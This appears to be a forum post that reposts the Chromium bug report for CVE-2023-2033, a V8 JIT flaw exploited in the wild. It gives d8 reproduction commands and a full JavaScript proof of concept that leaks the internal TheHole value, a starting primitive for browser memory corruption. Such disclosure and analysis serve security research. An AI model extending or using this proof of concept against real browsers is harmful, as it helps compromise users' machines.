Local CVE-2023-2033 (0day JIT optimisation issue)

[baykal]

Chrome actively exploited 0-day vulnerability (CVE-2023-2033)

GitHub - sandumjacob/CVE-2023-2033-Analysis: A collection of resources and information about CVE-2023-2033

A collection of resources and information about CVE-2023-2033 - GitHub - sandumjacob/CVE-2023-2033-Analysis: A collection of resources and information about CVE-2023-2033

github.com

[0day] JIT optimisation issue(Issue 1432210, CVE-2023-2033, Blink>JavaScript>Runtime & Blink>JavaScript>Compiler)

There seems to be a JIT optimisation issue allowing attacker to leak TheHole value. Filling this bug now as it is used ITW and we have a PoC demonstrating the issue. This might be an issue similar to CVE-2022-1364

Как воспроизвести?
TheHole leaked when using optimization

$ ./d8 --allow-natives-syntax hole.js

Same code fails with no optimization.

$ ./d8 --allow-natives-syntax --no-opt hole.js

hole.js

var h0le = [Object];
function boom() {
  var h00le = h0le;
  function rGlobal() {
    h00le[0] = stack;
    return h00le;
  }
  Error.captureStackTrace(globalThis);
  Error.prepareStackTrace = function() {
    Reflect.deleteProperty(Error, 'prepareStackTrace');
    Reflect.deleteProperty(globalThis, 'stack');
    Reflect.defineProperty(
        globalThis, 'stack',
        {configurable: false, writable: true, enumerable: true, value: 1});
    stack = undefined;
    for (let i = 0; i < 0x5000; i++) {
      rGlobal();
    }
    return undefined;
  };
  Reflect.defineProperty(
      globalThis, 'stack',
      {configurable: true, writable: true, enumerable: true, value: undefined});
  delete globalThis.stack;
  rGlobal();
  // the hole?!
  %DebugPrint(h0le[0]);
}
boom();